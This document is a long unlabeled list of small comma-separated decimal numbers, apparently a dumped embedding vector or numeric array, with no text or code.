-0.008202794939279556, 0.002918301848694682, -0.005353707820177078, 0.014061933383345604, -0.0028716218657791615, 0.01330217719078064, 0.017628926783800125, 0.0010969789000228047, 0.024093294516205788, -0.011016469448804855, -0.005237812642008066, 0.02053917944431305, -0.0010285686003044248, -0.023822873830795288, 0.013688494451344013, -0.014319478534162045, 0.018028119578957558, -0.01662450283765793, 0.011866366490721703, -0.036210767924785614, 0.02781481295824051, -0.0020861111115664244, 0.007314265705645084, 0.0000201835464395117, -0.011892120353877544, 0.0052764443680644035, 0.01713959127664566, 0.005559743382036686, 0.009290920570492744, 0.019315842539072037, -0.029566116631031036, 0.004123932681977749, 0.016817661002278328, 0.009696553461253643, 0.017281241714954376, 0.005228154826909304, 0.032965704798698425, 0.0074301608838140965, -0.03919828310608864, 0.010617274791002274, 0.029566116631031036, -0.05593867972493172, -0.04973185807466507, 0.01492470782250166, -0.019727913662791252, -0.002184299984946847, -0.007700582500547171, -0.025921860709786415, 0.012271998450160027, -0.0010358120780438185, 0.003053512889891863, -0.021543603390455246, -0.0007315875263884664, -0.0005424532573670149, -0.01800236478447914, -0.0017786672106012702, 0.01334080845117569, 0.02234199084341526, -0.018375804647803307, 0.004259143490344286, 0.01408768817782402, -0.010829749517142773, -0.030467523261904716, 0.024312207475304604, 0.04512180760502815, -0.0002513071522116661, 0.018491700291633606, 0.0201914943754673, -0.026089265942573547, 0.0037537121679633856, 0.013128334656357765, 0.026913408190011978, -0.014705794863402843, 0.010044238530099392, 0.019431738182902336, 0.020629320293664932, -0.02429933100938797, -0.01330217719078064, -0.02554842084646225, 0.02082247845828533, 0.0078422324731946, -0.006979458034038544, -0.008228548802435398, 0.02468564733862877, 0.020139984786510468, 0.02328202873468399, 0.02946309931576252, 0.017345627769827843, 0.004896566271781921, 0.01901966705918312, 0.007919495925307274, 0.010597959160804749, -0.0257415808737278, 0.005894551519304514, -0.05758696794509888, -0.010211641900241375, 0.009625728242099285, 0.0007251489441841841, 0.02065507508814335, -0.039893653243780136, -0.017113836482167244, -0.01334080845117569, -0.015903377905488014, -0.021801147609949112, 0.021839778870344162, 0.0037762473803013563, 0.013128334656357765, 0.005192742217332125, 0.043602295219898224, 0.021234549582004547, -0.0031758465338498354, -0.03474276140332222, -0.006992334965616465, -0.030853839591145515, -0.019547633826732635, -0.0007939616334624588, 0.006061955355107784, -0.008054706268012524, 0.00714042317122221, 0.009503394365310669, 0.02343655563890934, -0.0254325270652771, 0.00817704014480114, -0.058359600603580475, 0.0029617624823004007, 0.013533967547118664, 0.016611624509096146, -0.007410845253616571, 0.00853116437792778, 0.03780754283070564, 0.03216731548309326, -0.0068378085270524025, 0.0018527113134041429, 0.02637256495654583, 0.023294907063245773, -0.014448250643908978, -0.02750576101243496, 0.017203977331519127, 0.011248258873820305, 0.013063948601484299, -0.017809206619858742, 0.020204370841383934, 0.010861942544579506, 0.015671586617827415, 0.003113070037215948, 0.01976654678583145, 0.02186553366482258, 0.009677236899733543, 0.00359918549656868, 0.023848626762628555, 0.0014671991812065244, -0.006766983773559332, 0.002205225406214595, 0.01737138070166111, -0.014718672260642052, 0.007443038281053305, -0.0038824845105409622, 0.0015541205648332834, 0.002147277817130089, 0.01921282522380352, 0.006927948910742998, 0.0005670004757121205, -0.03415041044354439, 0.04179948568344116, -0.012098155915737152, 0.011125925928354263, 0.026501337066292763, -0.001171827781945467, 0.03850291296839714, 0.005550085566937923, -0.0031001928728073835, -0.01592913269996643, -0.02547115832567215, -0.04880469664931297, 0.0014631750527769327, 0.01976654678583145, 0.02750576101243496, -0.06536481529474258, 0.02078384719789028, 0.0001889330887934193, -0.001592752174474299, 0.005823726765811443, 0.029334327206015587, -0.016109412536025047, 0.01979229971766472, -0.0029150827322155237, 0.009754500351846218, -0.008421707898378372, -0.010462747886776924, -0.002153716515749693, -0.006734790746122599, -0.007443038281053305, 0.008872410282492638, 0.0003382284485269338, -0.00196055811829865, -0.0041593448258936405, -0.05138014256954193, 0.015169375576078892, 0.02887074649333954, 0.024698523804545403, 0.015916254371404648, 0.008383075706660748, 0.014036179520189762, -0.012001576833426952, 0.01447400450706482, 0.014950462616980076, -0.01142210140824318, -0.002271221252158284, 0.03788480535149574, -0.008112654089927673, -0.006889317184686661, 0.02871621958911419, -0.019187070429325104, 0.006535193417221308, 0.023913012817502022, 0.006361350882798433, -0.0201914943754673, 0.003195162396878004, -0.012033769860863686, 0.007088914513587952, 0.0207709688693285, -0.03438220173120499, 0.012149665504693985, 0.02053917944431305, 0.007604003418236971, 0.02332066185772419, -0.03796207159757614, -0.005872016306966543, 0.01752590760588646, -0.00823498796671629, -0.02840716578066349, 0.006242236588150263, -0.02374560944736004, -0.008228548802435398, -0.024634137749671936, -0.006342035252600908, 0.01679190620779991, 0.014332355000078678, 0.036880381405353546, -0.0023549231700599194, -0.01580035872757435, 0.012935176491737366, 0.011344837956130505, -0.015195129439234734, 0.025290876626968384, -0.032965704798698425, -0.012613245286047459, 0.027454251423478127, -0.011261136271059513, -0.0010333976242691278, -0.018337173387408257, -0.015156498178839684, 0.02719670720398426, 0.006229359190911055, 0.02015286311507225, -0.038090843707323074, 0.05593867972493172, 0.0006591531564481556, -0.003959747962653637, -0.008582673035562038, -0.01054645050317049, -0.03237335383892059, -0.010874819941818714, -0.03829687833786011, -0.010617274791002274, 0.04017695412039757, -0.00031690055038779974, -0.011937190778553486, -0.018028119578957558, 0.005987911485135555, 0.004358941689133644, 0.013327931985259056, -0.02817537635564804, -0.002816893858835101, -0.0031694078352302313, -0.009593535214662552, -0.020835356786847115, 0.006599579472094774, -0.050530243664979935, -0.04687311127781868, 0.030544785782694817, 0.00040221220115199685, 0.02437659353017807, 0.00931023620069027, -0.005115479230880737, 0.020809601992368698, 0.01925145648419857, 0.0053311726078391075, -0.0027476786635816097, 0.001190338865853846, -0.026282424107193947, 0.013572598807513714, 0.009496956132352352, -0.04906224086880684, -0.0039339931681752205, -0.017384259030222893, -0.027531513944268227, -0.03461398929357529, -0.01424221508204937, 0.005176645703613758, -0.004845057148486376, 0.012529543600976467, 0.0036120626609772444, -0.0007207223679870367, -0.01473154965788126, 0.0024997920263558626, 0.00990258902311325, 0.005952498875558376, 0.014255092479288578, 0.01394603867083788, 0.004915881901979446, -0.014847444370388985, 0.017654679715633392, 0.020951250568032265, 0.020487669855356216, -0.031317420303821564, -0.016148043796420097, 0.008395953103899956, -0.048572905361652374, -0.049474313855171204, 0.03803933411836624, 0.01905829831957817, -0.00391145795583725, 0.008872410282492638, 0.03275967016816139, -0.013881652615964413, 0.019856685772538185, -0.01070097740739584, -0.020629320293664932, -0.018568962812423706, -0.002325949491932988, -0.0308280847966671, -0.036133501678705215, 0.010900573804974556, 0.0019315843237563968, -0.0049577332101762295, -0.008659936487674713, 0.0314461924135685, -0.007913056761026382, 0.015079234726727009, 0.016560116782784462, -0.013025316409766674, -0.0028249421156942844, -0.044787000864744186, 0.0005082481075078249, 0.05320870876312256, 0.005131575744599104, -0.0073207044042646885, -0.007185493595898151, -0.009181464090943336, -0.0027669945266097784, 0.015311025083065033, 0.0029617624823004007, -0.013714248314499855, -0.004394354298710823, 0.001291746972128749, 0.008878849446773529, -0.004716285038739443, -0.03196128085255623, -0.008389514870941639, -0.022483641281723976, -0.017422890290617943, 0.0010438603349030018, 0.0052764443680644035, 0.00448127556592226, -0.02938583493232727, -0.00452956510707736, 0.017384259030222893, 0.020886864513158798, 0.024080418050289154, -0.04610047861933708, 0.026076387614011765, -0.030725067481398582, -0.011904997751116753, -0.00817704014480114, 0.03020997904241085, 0.011943629942834377, -0.011016469448804855, -0.01869773678481579, -0.001223336672410369, 0.02735123410820961, 0.02285708114504814, 0.011048662476241589, 0.019148439168930054, 0.0006185093661770225, 0.018066750839352608, 0.008994744159281254, -0.0198051780462265, -0.00016086475807242095, -0.00976093951612711, -0.01428084634244442, -0.004993145354092121, 0.02257378213107586, -0.02234199084341526, 0.01733274944126606, 0.01577460579574108, -0.0023291686084121466, -0.008292934857308865, -0.03667434677481651, -0.038760457187891006, 0.010881258174777031, 0.007005212362855673, -0.000778267509303987, 0.015529938042163849, -0.00616175401955843, 0.012915859930217266, -0.00015714243636466563, -0.014345232397317886, 0.0023790679406374693, -0.007855109870433807, 0.02332066185772419, -0.005675638560205698, -0.03626227751374245, 0.004094958771020174, 0.0257415808737278, 0.0068378085270524025, -0.02840716578066349, 0.0300554521381855, 0.0128707904368639, 0.002404822502285242, -0.022238973528146744, -0.001267602201551199, -0.018015243113040924, -0.004854714963585138, -0.009715869091451168, -0.010649467818439007, 0.000798790599219501, 0.01301243994385004, 0.026707371696829796, -0.0036442556884139776, -0.016856292262673378, -0.0011331961723044515, 0.021350445225834846, 0.007475231308490038, 0.014937585219740868, -0.03505181521177292, -0.00010583472612779588, -0.013997547328472137, -0.0025191078893840313, -0.05676282197237015, 0.0034285620786249638, -0.014486881904304028, -0.0035058255307376385, -0.0021955675911158323, 0.00945188570767641, 0.006396763492375612, 0.024402348324656487, -0.008898165076971054, -0.003088925266638398, 0.01117099542170763, -0.01093920599669218, -0.008711445145308971, 0.015323902480304241, -0.022908588871359825, -0.0412328876554966, 0.01741001382470131, 0.040511760860681534, 0.022135956212878227, -0.016057904809713364, 0.04718216508626938, 0.013572598807513714, -0.015916254371404648, 0.022251851856708527, -0.007372213527560234, -0.009529149159789085, -0.01551706064492464, -0.04620349779725075, 0.02711944282054901, 0.013456704095005989, -0.002673634560778737, 0.007713459897786379, -0.013141212053596973, -0.002882889471948147, -0.053826816380023956, 0.03878621384501457, -0.00028853039839304984, 0.014821690507233143, -0.006567386444658041, 0.03420192003250122, -0.00494807492941618, 0.0028844992630183697, -0.026037756353616714, 0.029746398329734802, 0.008537602610886097, 0.0051734265871346, 0.048495642840862274, -0.021080022677779198, -0.014152074232697487, 0.025715826079249382, -0.02093837410211563, -0.021144408732652664, -0.009477640502154827, 0.03502606227993965, -0.013495335355401039, 0.0011364154051989317, -0.004500591196119785, -0.03458823636174202, 0.0003197174519300461, -0.00025734337395988405, -0.0303645059466362, -0.0062647718004882336, 0.011183872818946838, -0.0037022032774984837, 0.026939162984490395, -0.03384135663509369, 0.03399588167667389, 0.003708641743287444, -0.025020455941557884, -0.01940598338842392, 0.020989881828427315, -0.034407954663038254, -0.026089265942573547, -0.0030438548419624567, 0.02892225608229637, -0.002889328170567751, 0.007610442116856575, -0.026501337066292763, -0.0011806809343397617, 0.012407209724187851, -0.004201195668429136, -0.01232350803911686, 0.009393937885761261, -0.037189435213804245, 0.011067978106439114, 0.007616880815476179, 0.03438220173120499, -0.005456725601106882, -0.027686040848493576, -0.026630109176039696, -0.014821690507233143, -0.03216731548309326, 0.008917480707168579, 0.004310652147978544, 0.009316674433648586, -0.012793526984751225, -0.008434584364295006, -0.01619955338537693, -0.026192283257842064, -0.0153754111379385, -0.0032595484517514706, 0.013688494451344013, -0.0008845046395435929, 0.0032788643147796392, 0.02848443016409874, 0.01156375091522932, -0.01815689168870449, -0.014255092479288578, 0.02105426788330078, -0.004239827394485474, 0.03170373663306236, -0.004326748661696911, -0.009876834228634834, 0.002483695512637496, -0.013018878176808357, -0.0028812799137085676, 0.012085279449820518, -0.00837019830942154, -0.018015243113040924, 0.01710096001625061, 0.006274429615586996, 0.00017535164079163224, -0.02923130802810192, 0.013920283876359463, -0.018890894949436188, -0.026733126491308212, -0.004484494682401419, -0.029591871425509453, 0.004082081373780966, -0.011847049929201603, 0.0056659807451069355, 0.09477639943361282, -0.0033352021127939224, -0.02879348397254944, -0.011801980435848236, -0.006618895567953587, 0.003409246215596795, -0.011782663874328136, -0.004094958771020174, -0.0062325787730515, -0.02453112043440342, 0.004574635531753302, 0.0049223206005990505, -0.012535981833934784, 0.005176645703613758, 0.008035390637814999, 0.0022277606185525656, 0.00792593415826559, 0.010108624584972858, 0.0048128641210496426, -0.00043420406291261315, 0.011904997751116753, 0.020564934238791466, 0.008151285350322723, -0.021195918321609497, -0.0001889330887934193, -0.00878227036446333, -0.03528360649943352, -0.007642635144293308, 0.00945188570767641, -0.008795146830379963, 0.0035058255307376385, -0.010243834927678108, 0.005373023450374603, 0.015980640426278114, -0.008183478377759457, 0.001195972552523017, 0.0052152774296700954, -0.01541404239833355, -0.015298147685825825, -0.01230419147759676, -0.0005484894500114024, 0.01083618775010109, 0.013418071903288364, -0.012053086422383785, 0.017616048455238342, -0.014422495849430561, 0.02856169268488884, -0.0022502955980598927, 0.006467588245868683, 0.004632582888007164, -0.0027138758450746536, -0.002391945105046034, -0.0005641835741698742, 0.013276422396302223, -0.004336406942456961, -0.013894530013203621, 0.005411655176430941, 0.017126714810729027, -0.00954846478998661, -0.008280058391392231, 0.008447461761534214, -0.004387915600091219, -0.002910253591835499, -0.0021166943479329348, 0.031909771263599396, 0.00925228837877512, 0.0020877206698060036, -0.001257139490917325, -0.018607595935463905, 0.0014285675715655088, -0.004600389860570431, 0.017075205221772194, -0.003930774051696062, -0.012709824368357658, -0.005537208169698715, 0.03525785356760025, 0.0022422473412007093, 0.029746398329734802, 0.0018639788031578064, -0.019238580018281937, 0.030158469453454018, 0.014409618452191353, 0.024325083941221237, 0.024582630023360252, 0.0035637731198221445, 0.024827295914292336, -0.0005416484200395644, -0.04293268173933029, -0.004758135881274939, -0.01686916872859001, -0.017796330153942108, -0.01956051029264927, 0.00376658933237195, -0.006934387609362602, -0.0035959661472588778, 0.015658710151910782, -0.005063970107585192, -0.004877250175923109, 0.002181080635637045, 0.011106609366834164, -0.014383864589035511, -0.014190705493092537, 0.019084053114056587, -0.0059653762727975845, -0.006583482958376408, -0.010063554160296917, -0.005707831587642431, 0.0207709688693285, -0.02535526268184185, -0.011673207394778728, -0.031755246222019196, -0.006889317184686661, 0.0034961674828082323, -0.0301327146589756, -0.012832158245146275, 0.015336778946220875, 0.010024922899901867, -0.016572993248701096, -0.0059235249646008015, -0.008634181693196297, 0.005115479230880737, -0.02681039087474346, 0.026733126491308212, 0.0151822529733181, 0.0024418444372713566, 0.0014406399568542838, 0.0002478866372257471, -0.025805966928601265, 0.011370592750608921, -0.00300361355766654, 0.02946309931576252, -0.005038215778768063, 0.022123077884316444, -0.020590689033269882, 0.028973763808608055, -0.01932872086763382, 0.013727125711739063, -0.007958127185702324, -0.03234759718179703, 0.00003166490569128655, -0.002050698734819889, 0.011151679791510105, 0.018105383962392807, 0.009535587392747402, 0.020861109718680382, 0.00040482787881046534, -0.044735491275787354, 0.011801980435848236, 0.009960535913705826, 0.037575751543045044, -0.018955281004309654, -0.003579869633540511, -0.00497061014175415, 0.025883229449391365, 0.008698567748069763, -0.013533967547118664, -0.007153300568461418, -0.03752424567937851, -0.0021118654403835535, -0.028278393670916557, 0.01375288050621748, 0.02711944282054901, 0.033197496086359024, -0.012297753244638443, -0.0010736389085650444, -0.00307604786939919, 0.007378651760518551, -0.008428146131336689, -0.017783451825380325, -0.014267968945205212, 0.0008643839973956347, 0.00862774346023798, -0.03466549888253212, -0.00999916810542345, 0.027093689888715744, 0.012027331627905369, -0.0057754372246563435, -0.008904603309929371, 0.004133590497076511, -0.0100571159273386, 0.018414437770843506, 0.00026780611369758844, 0.0028265516739338636, 0.017912225797772408, -0.00436216127127409, -0.013533967547118664, 0.00621004356071353, 0.0067412289790809155, -0.027480006217956543, 0.01992107182741165, -0.011840611696243286, 0.04483851045370102, -0.0031871141400188208, -0.01666313409805298, -0.009992728941142559, -0.041722219437360764, 0.0157617274671793, -0.004680872429162264, -0.007359336130321026, -0.0010688100010156631, 0.00242574792355299, 0.011492926627397537, 0.003294960828498006, 0.0008362150401808321, -0.015156498178839684, -0.012890106067061424, 0.024402348324656487, 0.0007086499826982617, 0.009599974378943443, 0.001270821550861001, -0.00915570929646492, 0.0125617366284132, 0.008318689651787281, 0.02652708999812603, 0.006052297540009022, -0.015208006836473942, 0.0009521101019345224, -0.006461149547249079, -0.006766983773559332, -0.018414437770843506, -0.015478428453207016, 0.011100171133875847, 0.026475582271814346, 0.0073013887740671635, -0.015439797192811966, 0.004729162435978651, 0.03572143241763115, -0.011261136271059513, -0.017319872975349426, 0.013115457259118557, 0.010340414941310883, 0.0063774473965168, 0.0067412289790809155, -0.006061955355107784, -0.012040209025144577, 0.002707437379285693, -0.020165739580988884, -0.006985896732658148, -0.006625334266573191, -0.009966975077986717, -0.013199158944189548, 0.013018878176808357, -0.011319084092974663, 0.019856685772538185, 0.014937585219740868, -0.00012927530042361468, 0.016173798590898514, -0.01093920599669218, -0.001991141587495804, 0.008872410282492638, -0.03430493548512459, -0.0020426504779607058, 0.012432964518666267, -0.00136176694650203, -0.021504972130060196, 0.012027331627905369, -0.024621261283755302, 0.02046191692352295, 0.04648679494857788, -0.021981429308652878, 0.012465157546103, 0.0099412202835083, -0.024157680571079254, 0.015104989521205425, -0.03314598649740219, 0.013224913738667965, -0.01905829831957817, 0.009039814583957195, 0.017989488318562508, 0.001559754367917776, -0.012857913039624691, 0.0151822529733181, -0.018169770017266273, -0.0050285579636693, -0.008325127884745598, -0.012027331627905369, -0.01619955338537693, -0.004809645004570484, -0.0011557312682271004, 0.0035541150718927383, 0.0067283520475029945, 0.047645747661590576, 0.007172616198658943, -0.05454793944954872, -0.01191787514835596, 0.015336778946220875, -0.03314598649740219, -0.012394332326948643, -0.010301782749593258, -0.03927554562687874, 0.0009046252816915512, 0.0026784634683281183, -0.024556875228881836, -0.0017303775530308485, 0.020564934238791466, -0.03698340058326721, -0.016727520152926445, -0.005063970107585192, 0.00030885229352861643, 0.009793132543563843, 0.017010819166898727, 0.010565766133368015, 0.02257378213107586, 0.02704218029975891, -0.02089974284172058, 0.007526739966124296, -0.011634576134383678, 0.003328763647004962, -0.0042688013054430485, -0.00687644025310874, -0.004078862257301807, -0.00823498796671629, -0.001282893936149776, 0.00827361922711134, 0.0015887280460447073, -0.01572309620678425, 0.01039192359894514, 0.02496894635260105, -0.012342823669314384, 0.004011256620287895, -0.007011651061475277, -0.0051412335596978664, -0.025999125093221664, -0.016212431713938713, -0.014512636698782444, 0.001558144693262875, 0.017860716208815575, 0.017010819166898727, -0.014911830425262451, -0.007539617363363504, 0.010823310352861881, 0.013843020424246788, 0.02637256495654583, 0.014229337684810162, 0.0006458734860643744, -0.022548027336597443, 0.03659708425402641, 0.002202006056904793, 0.023822873830795288, -0.01142210140824318, -0.01398466993123293, 0.030802330002188683, -0.007133984472602606, 0.001992751145735383, -0.014873199164867401, 0.005801191553473473, -0.010430554859340191, -0.019161315634846687, 0.0032853030133992434, -0.002535204403102398, -0.016019271686673164, 0.009593535214662552, -0.028690464794635773, 0.009142831899225712, -0.0020088476594537497, 0.010823310352861881, 0.0024096514098346233, -0.02128605917096138, 0.015349656343460083, -0.020449038594961166, -0.005897770635783672, -0.016972187906503677, -0.03667434677481651, -0.031832508742809296, -0.009690114296972752, 0.008589111268520355, 0.004819302819669247, 0.007893741130828857, -0.013907406479120255, -0.019818054512143135, -0.0006434590322896838, 0.009445447474718094, -0.012220489792525768, 0.022548027336597443, -0.016379835084080696, 0.01815689168870449, 0.01589049957692623, -0.0028024069033563137, -0.011840611696243286, -0.011113048531115055, -0.008518286980688572, 0.01800236478447914, -0.01146717183291912, -0.022470764815807343, 0.010990714654326439, 0.019727913662791252, -0.020397530868649483, 0.0023307783994823694, -0.016894923523068428, 0.01152511965483427, 0.009806009940803051, 0.00267524435184896, -0.014332355000078678, 0.029720643535256386, 0.005208839196711779, -0.0013843020424246788, 0.01039192359894514, -0.015156498178839684, 0.003821317572146654, -0.01191787514835596, -0.02053917944431305, -0.009683676064014435, 0.00808046106249094, 0.009767377749085426, 0.010063554160296917, 0.02683614380657673, 0.002501401584595442, -0.017474399879574776, -0.001855930546298623, 0.028664710000157356, -0.009516271762549877, 0.02789207734167576, 0.004326748661696911, -0.019302966073155403, -0.018800754100084305, -0.006197166163474321, 0.006490122992545366, -0.009072007611393929, 0.0017641803715378046, 0.004664775915443897, -0.003058341797441244, 0.003470413153991103, -0.021273180842399597, -0.016843415796756744, -0.006766983773559332, -0.011950068175792694, -0.002237418433651328, -0.026913408190011978, 0.018968157470226288, -0.01881363056600094, 0.015594324097037315, 0.022638168185949326, 0.005843042396008968, 0.005694954190403223, -0.0012579442700371146, -0.0064836847595870495, 0.01686916872859001, 0.005894551519304514, 0.0037762473803013563, -0.0036635715514421463, 0.017551662400364876, -0.005009241867810488, -0.020912619307637215, -0.008750076405704021, -0.003686106763780117, 0.015529938042163849, -0.009393937885761261, -0.0059042093344032764, -0.007977442815899849, -0.007649073842912912, 0.01890377141535282, -0.0006297769723460078, 0.004645460285246372, -0.0037022032774984837, -0.01932872086763382, 0.010507818311452866, -0.023565327748656273, 0.011808418668806553, -0.0026301739271730185, -0.0002044260036200285, 0.021968552842736244, 0.021080022677779198, 0.02856169268488884, 0.0006531169638037682, 0.006396763492375612, -0.0022792695090174675, -0.0027106567285954952, 0.002531985053792596, -0.007443038281053305, -0.04581717774271965, -0.009838202968239784, 0.01854320988059044, 0.010913451202213764, 0.00025412405375391245, -0.0020217248238623142, 0.0029617624823004007, 0.0033158862497657537, -0.01698506437242031, -0.024775788187980652, -0.015491305850446224, 0.021762516349554062, -0.0035541150718927383, -0.006187508348375559, -0.006979458034038544, -0.013830143958330154, 0.03518058732151985, -0.0004563367983791977, 0.017976611852645874, -0.006480465177446604, 0.004783890210092068, 0.00954846478998661, 0.00025311802164651453, -0.002453112043440342, 0.018053874373435974, 0.008054706268012524, -0.012156103737652302, -0.006831369828432798, 0.030647804960608482, 0.0011468781158328056, -0.013714248314499855, -0.023681223392486572, -0.010655906982719898, 0.010881258174777031, 0.011331961490213871, 0.00018319870287086815, -0.009065569378435612, 0.008061145432293415, -0.006309842225164175, 0.0038535105995833874, -0.017834961414337158, -0.005199180915951729, -0.00808046106249094, 0.001637017703615129, -0.004474836867302656, 0.003354517975822091, -0.009722307324409485, -0.00872432254254818, -0.007166177500039339, -0.0303645059466362, -0.031677983701229095, -0.0052217161282896996, 0.01796373352408409, 0.0005581473815254867, -0.00837663747370243, 0.0013649861793965101, -0.004532784689217806, -0.006255113985389471, -0.0030937541741877794, -0.00999916810542345, 0.008730760775506496, 0.0017545224400237203, -0.002453112043440342, -0.013199158944189548, -0.011216065846383572, -0.018568962812423706, 0.015130743384361267, 0.00028148817364126444, -0.01608365774154663, -0.0016563335666432977, -0.008524725213646889, 0.013804389163851738, -0.041104115545749664, 0.011409224942326546, 0.00011841014202218503, 0.0012716263299807906, -0.002813674509525299, 0.008524725213646889, -0.00544706778600812, 0.013495335355401039, -0.0036603522021323442, 0.005327953491359949, 0.009921904653310776, 0.004571415949612856, 0.003024538978934288, -0.007668389473110437, 0.01447400450706482, 0.0020539178512990475, 0.0023967742454260588, -0.01177622564136982, -0.001612872933037579, -0.00494807492941618, 0.023333538323640823, 0.023848626762628555, 0.008878849446773529, -0.010340414941310883, 0.011061538942158222, 0.005488918628543615, 0.013315054588019848, -0.0011162947630509734, -0.019418859854340553, 0.011087293736636639, -0.02182690240442753, -0.002810455160215497, 0.002266392344608903, -0.013166965916752815, 0.010784679092466831, -0.00182695675175637, -0.013740003108978271, -0.021620865911245346, -0.007707021199166775, 0.006348473485559225, 0.004835399333387613, -0.026707371696829796, 0.0006527145160362124, 0.0024064320605248213, -0.005060750991106033, 0.004368599969893694, -0.0024627698585391045, -0.04656405746936798, -0.01473154965788126, 0.03118864819407463, 0.015735972672700882, -0.01850457675755024, 0.017989488318562508, -0.0016168970614671707, -0.015323902480304241, 0.019084053114056587, -0.009883273392915726, -0.004516687709838152, 0.024827295914292336, -0.02074521593749523, 0.0016152873868122697, -0.007249879650771618, -0.015001971274614334, -0.004870811942964792, 0.0018511016387492418, 0.021118655800819397, 0.026127897202968597, -0.004320310428738594, 0.0055146729573607445, -0.008389514870941639, -0.02590898424386978, 0.008524725213646889, 0.020358897745609283, 0.018633348867297173, -0.004391135182231665, -0.00788730289787054, 0.02211020141839981, -0.027402741834521294, -0.028201131150126457, 0.0038502912502735853, 0.006454710848629475, -0.00866637472063303, 0.002243857132270932, -0.016534361988306046, 0.003727957606315613, 0.018066750839352608, -0.019045421853661537, -0.0025496913585811853, -0.008550480008125305, 0.011840611696243286, 0.012194735929369926, -0.0036667909007519484, 0.00489978538826108, 0.0023517038207501173, 0.02660435438156128, -0.02414480410516262, 0.004210853949189186, 0.013907406479120255, 0.005527550354599953, 0.004986706655472517, -0.03577294200658798, -0.0038277562707662582, -0.007649073842912912, -0.004082081373780966, -0.013559721410274506, 0.02617940492928028, 0.012407209724187851, -0.019612019881606102, -0.0007537202909588814, 0.026552844792604446, -0.014654286205768585, -0.007030966691672802, 0.002174641937017441, -0.027531513944268227, -0.026243790984153748, -0.009767377749085426, -0.001828566426411271, -0.012529543600976467, 0.005356926936656237, 0.017010819166898727, 0.01616092212498188, -0.0057400246150791645, 0.011731155216693878, 0.014139196835458279, 0.027917832136154175, -0.0049223206005990505, 0.021543603390455246, 0.006441833451390266, 0.0038020017091184855, -0.015079234726727009, 0.012220489792525768, -0.02265104465186596, 0.012336385436356068, 0.006863562855869532, -0.006358131766319275, -0.0005911453044973314, 0.00036458653630688787, -0.03317173942923546, -0.026230914518237114, 0.004606828559190035, 0.012857913039624691, 0.0048675923608243465, -0.0028603544924408197, 0.00719837099313736, -0.0009022108279168606, 0.009387499652802944, -0.010559327900409698, -0.0009714259067550302, 0.0009400377166457474, 0.01019232627004385, 0.0015726315323263407, 0.00426558218896389, 0.012639000080525875, 0.001404422800987959, -0.025149228051304817, 0.0030647804960608482, 0.009316674433648586, 0.018787875771522522, 0.031137138605117798, 0.012053086422383785, -0.006548070814460516, 0.002886108821257949, -0.015117865987122059, 0.009554903954267502, -0.0022808790672570467, 0.002485305070877075, 0.005034996196627617, 0.011550874449312687, -0.007063159719109535, -0.00041026045801118016, -0.004629363771528006, 0.00821567140519619, 0.0011130754137411714, 0.001539633609354496, 0.03098261170089245, -0.011409224942326546, 0.0013995937770232558, 0.019573386758565903, -0.0008233378175646067, -0.018955281004309654, 0.022509396076202393, 0.008621304295957088, -0.009355306625366211, -0.009284481406211853, -0.0016965748509392142, -0.01477018091827631, -0.023140380159020424, -0.023372169584035873, -0.01379151176661253, 0.04033147916197777, -0.002507840283215046, 0.01398466993123293, 0.02120879478752613, -0.00001862419412645977, -0.021234549582004547, -0.011705400422215462, -0.00866637472063303, -0.007352897431701422, -0.021659499034285545, 0.02191704325377941, 0.005009241867810488, -0.007127546239644289, -0.015529938042163849, -0.009162148460745811, 0.004761355463415384, 0.010269589722156525, 0.028896501287817955, -0.00556618208065629, 0.015671586617827415, -0.015620077960193157, 0.008421707898378372, -0.000595169432926923, 0.001883294666185975, 0.009348868392407894, -0.008614866062998772, 0.01167964655905962, 0.00043541128979995847, 0.010243834927678108, 0.004143248312175274, 0.01408768817782402, 0.005485699512064457, 0.0010567376157268882, 0.02504620887339115, 0.013366563245654106, 0.01683053746819496, 0.007340020500123501, -0.025136349722743034, 0.0007553299656137824, 0.0012547249207273126, 0.007172616198658943, 0.016598748043179512, 0.027325479313731194, -0.0075653716921806335, 0.016418466344475746, -0.0019798739813268185, 0.009921904653310776, -0.023346414789557457, -0.015156498178839684, -0.0020571372006088495, 0.008614866062998772, -0.008009635843336582, -0.012973807752132416, -0.010829749517142773, 0.030622050166130066, 0.010907012969255447, 0.0009255508193746209, 0.019431738182902336, 0.00497061014175415, -0.02101563662290573, -0.004912662785500288, -0.0028506964445114136, 0.00046881160233169794, 0.011982261203229427, -0.005022119265049696, -0.02711944282054901, -0.012973807752132416, -0.004114274401217699, 0.010662345215678215, -0.005363365635275841, 0.012935176491737366, -0.029746398329734802, -0.01281284261494875, 0.003686106763780117, 0.003303009085357189, 0.0062647718004882336, -0.02280557155609131, 0.0011509023606777191, 0.02301160804927349, -0.01589049957692623, -0.005759340710937977, 0.005746463313698769, -0.019663527607917786, -0.0016579431248828769, -0.02053917944431305, -0.00039114581886678934, -0.02289571240544319, 0.005360146518796682, 0.014203582890331745, -0.01777057535946369, 0.013166965916752815, 0.009780255146324635, 0.007707021199166775, -0.0017593513475731015, 0.010411239229142666, -0.015620077960193157, 0.02688765339553356, -0.03324900567531586, -0.009683676064014435, -0.0018205181695520878, -0.004523126408457756, 0.0033480795100331306, -0.005009241867810488, -0.02675888128578663, -0.006586702540516853, -0.0020555276423692703, -0.0017963733989745378, -0.005562962964177132, -0.01835004985332489, 0.020513424649834633, 0.0031259472016245127, -0.006786299403756857, 0.015156498178839684, 0.02285708114504814, -0.013649862259626389, 0.00813840888440609, -0.011454294435679913, -0.0023967742454260588, -0.0011661939788609743, -0.011402785778045654, -0.01650860719382763, -0.0017738381866365671, 0.010823310352861881, -0.007661951240152121, 0.010494940914213657, -0.006525535602122545, 0.005089724436402321, -0.012948052957654, -0.014139196835458279, 0.009670798666775227, -0.013212036341428757, 0.00321286846883595, 0.009587096981704235, -0.015452674590051174, -0.008434584364295006, -0.002073233714327216, -0.050375718623399734, 0.01604502648115158, -0.001688526594080031, 0.0037987823598086834, -0.01635408028960228, 0.0024627698585391045, 0.03185826539993286, -0.016057904809713364, 0.005843042396008968, -0.012948052957654, -0.009542026557028294, -0.005295760463923216, -0.023140380159020424, -0.0126583157107234, 0.01773194409906864, -0.009979852475225925, -0.011010030284523964, 0.004593951161950827, 0.0020941593684256077, -0.006216482259333134, -0.0036925452295690775, -0.005797971971333027, -0.023719854652881622, -0.012671193107962608, -0.01359835360199213, 0.009696553461253643, -0.01428084634244442, 0.01658586971461773, 0.013572598807513714, -0.00665108859539032, -0.0027187049854546785, -0.000845068134367466, 0.015336778946220875, 0.0075653716921806335, 0.003470413153991103, -0.0018189084948971868, 0.005266786552965641, 0.01457702275365591, 0.00610380619764328, 0.010230958461761475, 